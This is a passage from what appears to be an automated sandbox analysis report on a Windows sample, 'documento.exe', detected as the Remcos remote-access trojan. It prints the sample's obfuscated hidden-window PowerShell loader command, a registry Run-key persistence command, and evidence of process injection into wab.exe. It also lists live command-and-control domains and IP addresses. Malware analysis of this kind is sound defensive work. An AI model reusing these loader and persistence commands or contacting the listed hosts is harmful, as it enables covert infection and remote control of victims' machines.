              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4335Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5617Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 1377Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 1029Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5935Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1725Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1028Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1322Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3801Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3603Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 614
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1644
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2950
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1735
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3148Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3164Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3460Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3588Thread sleep count: 1377 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3596Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3608Thread sleep count: 1029 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3608Thread sleep time: -3087000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3604Thread sleep count: 97 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3604Thread sleep time: -48500s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3608Thread sleep count: 5935 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3608Thread sleep time: -17805000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3780Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3784Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3824Thread sleep count: 3801 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3812Thread sleep count: 3603 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3876Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4068Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep count: 2950 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep count: 1735 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3180Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep time: -360000s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2052Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3376Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 1377 delay: -5Jump to behavior
              Source: C:\Users\user\Desktop\documento.exeCode function: 0_2_00406001 FindFirstFileA,FindClose,0_2_00406001
              Source: C:\Users\user\Desktop\documento.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
              Source: C:\Users\user\Desktop\documento.exeCode function: 0_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Deinotherium\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Jump to behavior
              Source: C:\Users\user\Desktop\documento.exeAPI call chain: ExitProcess graph end nodegraph_0-3553
              Source: C:\Users\user\Desktop\documento.exeAPI call chain: ExitProcess graph end nodegraph_0-3557
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_001AD53C LdrInitializeThunk,3_2_001AD53C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F2522 mov edx, dword ptr fs:[00000030h]15_2_083F2522
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F2892 mov ebx, dword ptr fs:[00000030h]15_2_083F2892
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F2892 mov ebx, dword ptr fs:[00000030h]15_2_083F2892
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F2892 mov ebx, dword ptr fs:[00000030h]15_2_083F2892
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F278E mov ebx, dword ptr fs:[00000030h]15_2_083F278E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F278E mov ebx, dword ptr fs:[00000030h]15_2_083F278E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F278E mov ebx, dword ptr fs:[00000030h]15_2_083F278E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F278E mov ebx, dword ptr fs:[00000030h]15_2_083F278E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F2781 mov eax, dword ptr fs:[00000030h]15_2_083F2781
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_083F24EE mov edx, dword ptr fs:[00000030h]15_2_083F24EE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 1F90000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 22F91CJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 1F90000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 14FA18Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 1F90000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 21FC78
              Source: C:\Users\user\Desktop\documento.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%knkbrdet% -windowstyle minimized $preeternal=(get-itemproperty -path 'hkcu:\morassweed\').herbalize;%knkbrdet% ($preeternal)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%knkbrdet% -windowstyle minimized $preeternal=(get-itemproperty -path 'hkcu:\morassweed\').herbalize;%knkbrdet% ($preeternal)"Jump to behavior
              Source: wab.exe, 00000006.00000002.866892514.00000000003D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerndows PowerShellll\v1.0\powershell.exe
              Source: wab.exe, 00000006.00000002.866892514.0000000000407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 00000006.00000002.866892514.000000000042B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\documento.exeCode function: 0_2_00405D1F GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D1F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3336, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
              Searches for Windows Mail specific files
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Program Files (x86)\Windows Mail wab.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Program Files (x86)\Windows Mail wab.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Program Files (x86)\Windows Mail *Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Program Files (x86)\Windows Mail NULLJump to behavior

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3336, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		11
              Input Capture              		4
              File and Directory Discovery              		Remote Services1
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts111
              Command and Scripting Interpreter              		1
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		1
              Obfuscated Files or Information              		LSASS Memory15
              System Information Discovery              		Remote Desktop Protocol1
              Email Collection              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell              		Logon Script (Windows)112
              Process Injection              		1
              Install Root Certificate              		Security Account Manager1
              Security Software Discovery              		SMB/Windows Admin Shares11
              Input Capture              		2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		NTDS1
              Query Registry              		Distributed Component Object Model1
              Clipboard Data              		213
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Masquerading              		LSA Secrets2
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Modify Registry              		Cached Domain Credentials31
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
              Virtualization/Sandbox Evasion              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation              		Proc Filesystem1
              Remote System Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
              Process Injection              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1434785 Sample: documento.exe Startdate: 01/05/2024 Architecture: WINDOWS Score: 100 51 learfo55ozj01.duckdns.org 2->51 61 Snort IDS alert for network traffic 2->61 63 Multi AV Scanner detection for domain / URL 2->63 65 Found malware configuration 2->65 69 10 other signatures 2->69 10 documento.exe 8 31 2->10         started        14 powershell.exe 6 2->14         started        16 powershell.exe 2->16         started        signatures3 67 Uses dynamic DNS services 51->67 process4 file5 47 C:\Users\user\AppData\...\Fermentatively.Bry, ASCII 10->47 dropped 79 Suspicious powershell command line found 10->79 18 powershell.exe 5 10->18         started        22 powershell.exe 2 14->22         started        24 powershell.exe 16->24         started        signatures6 process7 file8 45 C:\Users\user\AppData\Local\...\documento.exe, PE32 18->45 dropped 71 Obfuscated command line found 18->71 73 Searches for Windows Mail specific files 18->73 75 Writes to foreign memory regions 18->75 77 Powershell drops PE file 18->77 26 wab.exe 5 11 18->26         started        31 cmd.exe 18->31         started        33 wab.exe 9 22->33         started        35 cmd.exe 22->35         started        37 wab.exe 24->37         started        39 cmd.exe 24->39         started        signatures9 process10 dnsIp11 53 learfo55ozj02.duckdns.org 26->53 55 learfo55ozj01.duckdns.org 192.169.69.26, 29871, 29872, 49162 WOWUS United States 26->55 57 ricohltd.top 104.21.60.38, 443, 49161, 49205 